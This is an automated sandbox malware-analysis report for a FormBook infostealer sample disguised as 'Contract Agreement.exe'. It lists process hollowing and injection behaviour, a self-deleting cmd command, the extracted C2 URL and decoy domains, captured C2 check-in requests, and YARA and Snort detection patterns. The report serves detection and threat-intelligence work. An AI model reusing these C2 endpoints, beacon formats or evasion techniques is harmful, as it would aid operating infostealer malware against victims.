Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Contract Agreement.exe

Overview

General Information

Sample Name:Contract Agreement.exe
Analysis ID:385426
MD5:75612f2e3922d80afe14068c3a510c99
SHA1:ade818e1272e6131c504273ca678ff805d01d41d
SHA256:913b12686b62bfbaa6cd0169c2b37bb2d06d095335f3ac14047ec49d3a755b2d
Tags:Formbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Contract Agreement.exe (PID: 7012 cmdline: 'C:\Users\user\Desktop\Contract Agreement.exe' MD5: 75612F2E3922D80AFE14068C3A510C99)
    • Contract Agreement.exe (PID: 7056 cmdline: 'C:\Users\user\Desktop\Contract Agreement.exe' MD5: 75612F2E3922D80AFE14068C3A510C99)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 5784 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 2016 cmdline: /c del 'C:\Users\user\Desktop\Contract Agreement.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.middlehambooks.com/klf/"], "decoy": ["podcastyourvote.com", "northernlsx.com", "guide4idiots.com", "artebythesea.com", "sapanyc.com", "livinoutthedreamsco.com", "thepowersinyou.com", "protocolmodern.com", "holdergear.com", "betteringthehumanexperience.xyz", "agnostec.com", "royermaldonado.com", "wealthtruckingco.com", "artcode-software.com", "microsoftpods.com", "identityofplace.com", "algoritas.com", "grandpaurbanfarm.net", "zahidibr.com", "flawlessdrinking.com", "amymako.com", "tinymodeldiana.com", "restoremyorigin.com", "gyrostoyou.com", "boiler-portal.com", "aprilmarieclaire.com", "midollan.com", "finestfaux.com", "lownak.com", "okque.com", "woodandresin.club", "benficalovers.com", "fangyu5827.com", "tententacleshydro.com", "oouuweee.com", "sgsnit.com", "fairisnotfair.com", "shpwmy.com", "238olive.com", "4515a.com", "frontrangetechnologies.com", "v-travelclub.com", "supportserverhotline23.info", "snowandmotion.com", "colinboycemp.net", "yowoit.com", "neopivot.com", "singlebarrel.net", "esdras-almeida.com", "contecoliving.com", "doctorsdietgulfport.com", "issue72-paypal.com", "pubgfrut.com", "constipationhub.com", "themodernspiritualgoddess.com", "qzhongkong.com", "bizcert360.com", "nashvillegems.com", "barryteeling.com", "wzocflfor.com", "mirrorsmarbella.com", "nyariorganics.com", "packtmall.com", "100973671.review"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.Contract Agreement.exe.1eda0000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.Contract Agreement.exe.1eda0000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.Contract Agreement.exe.1eda0000.2.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        1.1.Contract Agreement.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.1.Contract Agreement.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.middlehambooks.com/klf/"], "decoy": ["podcastyourvote.com", "northernlsx.com", "guide4idiots.com", "artebythesea.com", "sapanyc.com", "livinoutthedreamsco.com", "thepowersinyou.com", "protocolmodern.com", "holdergear.com", "betteringthehumanexperience.xyz", "agnostec.com", "royermaldonado.com", "wealthtruckingco.com", "artcode-software.com", "microsoftpods.com", "identityofplace.com", "algoritas.com", "grandpaurbanfarm.net", "zahidibr.com", "flawlessdrinking.com", "amymako.com", "tinymodeldiana.com", "restoremyorigin.com", "gyrostoyou.com", "boiler-portal.com", "aprilmarieclaire.com", "midollan.com", "finestfaux.com", "lownak.com", "okque.com", "woodandresin.club", "benficalovers.com", "fangyu5827.com", "tententacleshydro.com", "oouuweee.com", "sgsnit.com", "fairisnotfair.com", "shpwmy.com", "238olive.com", "4515a.com", "frontrangetechnologies.com", "v-travelclub.com", "supportserverhotline23.info", "snowandmotion.com", "colinboycemp.net", "yowoit.com", "neopivot.com", "singlebarrel.net", "esdras-almeida.com", "contecoliving.com", "doctorsdietgulfport.com", "issue72-paypal.com", "pubgfrut.com", "constipationhub.com", "themodernspiritualgoddess.com", "qzhongkong.com", "bizcert360.com", "nashvillegems.com", "barryteeling.com", "wzocflfor.com", "mirrorsmarbella.com", "nyariorganics.com", "packtmall.com", "100973671.review"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Contract Agreement.exeReversingLabs: Detection: 20%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Contract Agreement.exe.1eda0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Contract Agreement.exe.1eda0000.2.raw.unpack, type: UNPACKEDPE
          Source: 0.2.Contract Agreement.exe.1eda0000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.Contract Agreement.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.cmstp.exe.4bff834.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 4.2.cmstp.exe.5bbc70.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.Contract Agreement.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Contract Agreement.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: cmstp.pdbGCTL source: Contract Agreement.exe, 00000001.00000002.687889109.0000000000970000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000002.916848212.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Contract Agreement.exe, 00000000.00000003.644430719.000000001EF60000.00000004.00000001.sdmp, Contract Agreement.exe, 00000001.00000002.688088335.0000000000B0F000.00000040.00000001.sdmp, cmstp.exe, 00000004.00000002.907753990.00000000046D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Contract Agreement.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: Contract Agreement.exe, 00000001.00000002.687889109.0000000000970000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000002.916848212.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49750 -> 142.111.179.147:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49750 -> 142.111.179.147:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49750 -> 142.111.179.147:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49756 -> 72.52.251.1:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49756 -> 72.52.251.1:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49756 -> 72.52.251.1:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.middlehambooks.com/klf/
          Source: global trafficHTTP traffic detected: GET /klf/?bl=VTChTP0hZXHDb84&Y4pTrva=ZAijfgstlYq8fKC0iYK9133s/sVwbQ6uXCBDF/fP0oHXHYAEtG3x8g/iP6moTRr8/loA HTTP/1.1Host: www.sapanyc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /klf/?Y4pTrva=l4OXKFqiDRIL5M7Qs3ptSHdfRIx3aIBnF9VcnLQHKrQrW9fnriE9a3t8qZQrlYiaWXmB&bl=VTChTP0hZXHDb84 HTTP/1.1Host: www.bizcert360.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: Joe Sandbox ViewASN Name: LIQUIDWEBUS LIQUIDWEBUS
          Source: global trafficHTTP traffic detected: GET /klf/?bl=VTChTP0hZXHDb84&Y4pTrva=ZAijfgstlYq8fKC0iYK9133s/sVwbQ6uXCBDF/fP0oHXHYAEtG3x8g/iP6moTRr8/loA HTTP/1.1Host: www.sapanyc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /klf/?Y4pTrva=l4OXKFqiDRIL5M7Qs3ptSHdfRIx3aIBnF9VcnLQHKrQrW9fnriE9a3t8qZQrlYiaWXmB&bl=VTChTP0hZXHDb84 HTTP/1.1Host: www.bizcert360.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.sapanyc.com
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000002.908299208.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.671346590.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Contract Agreement.exe.1eda0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Contract Agreement.exe.1eda0000.2.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Contract Agreement.exe.1eda0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Contract Agreement.exe.1eda0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Contract Agreement.exe.1eda0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Contract Agreement.exe.1eda0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00419E90 NtClose,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00419D5A NtCreateFile,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00419DB4 NtReadFile,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00419E0A NtReadFile,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
